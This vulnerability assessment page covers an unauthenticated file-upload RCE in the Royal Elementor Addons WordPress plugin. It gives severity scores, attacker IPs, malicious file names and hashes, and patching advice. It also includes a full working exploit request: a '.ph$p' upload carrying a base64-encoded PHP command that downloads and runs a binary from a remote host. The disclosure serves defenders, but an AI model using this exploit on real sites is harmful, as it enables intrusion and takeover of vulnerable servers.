9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.911 High
EPSS
Percentile
98.9%
The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.
Recent assessments:
jheysel-r7 at November 29, 2023 9:40pm UTC reported:
The Royal Elementor Addons and Templates WordPress plugin provides themes and templates to make your WordPress site aesthetically pleasing with little effort. With over 200,000 installations it is quite popular making it a fantastic target for opportunistic attackers.
Versions prior to 1.3.79 are vulnerable to a file upload vulnerability which results in code execution as the user running the WordPress site. Once a WordPress site is configured to use the Addon the following action wpr_addons_upload_file
listens for input on the /wp-admin/admin-ajax.php
endpoint and is envokeable via a POST request. The action is accessible without authentication and fails to properly sanitize incoming file types. The endpoint wonβt allow you to upload the .php
file type however if you upload a PHP payload with the filetype .ph$p
it bypasses the sanitization mechanism and allows you to drop a payload on the target.
Exploitation of the vulnerability is demonstrated in the following POST request:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress.docksal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Content-Type: multipart/form-data; boundary=---------------------------612499444778935602855148342223
Content-Length: 1078
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="uploaded_file"; filename="WmrRA8wI.ph$p"
Content-Type: application/octet-stream
<?php system(base64_decode('Y3VybCAtc28gLi92RVNIVllzd0p2dyBodHRwOi8vMTcyLjE2LjE5OS4xMzc6ODA4MC9rQW9vd3NKYnpVRER3X2FDbFg4RDhnOyBjaG1vZCAreCAuL3ZFU0hWWXN3SnZ3OyAuL3ZFU0hWWXN3SnZ3ICY='));?>
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="action"
wpr_addons_upload_file
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="max_file_size"
6395
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="allowed_file_types"
ph$p
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="triggering_event"
click
-----------------------------612499444778935602855148342223
Content-Disposition: form-data; name="wpr_addons_nonce"
aa1b436f01
-----------------------------612499444778935602855148342223--
This has been actively exploited in the wild for a while now with the first signs of exploitation dating back to December 2019.
Malicious adversaries have been identified dropping reverse shells in the following two filenames:
b1ack.p$hp
with md5sum: 1635f34d9c1da30ff5438e06d3ea6590
wp.ph$p
with md5sum: ββbac83f216eba23a865c591dbea427f22
That being said, I would be suspicious of any .ph$p
file if the Royal Elementor Addons and Template plugin was being used in my WordPress site.
*Note: Updating the plugin to the patched version 1.3.79
wonβt remove malicious payloads dropped by an attacker β so be sure to scan for unwanted footholds after patching.
The majority of the attacks appear to be coming from the following three IP Addresses:
65[.]21.22.78
2a01[:]4f9:3080:4eea::2
135[.]181.181.50
This is super easy to exploit.
Itβs an unauth RCE in an internet facing application with +200,000 active installations (itβs a big deal)
Exploited in the wild
The only reason Iβd give it a 4/5 for Attack Value is because it doesnβt give privileged access.
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.7 High
AI Score
Confidence
High
0.911 High
EPSS
Percentile
98.9%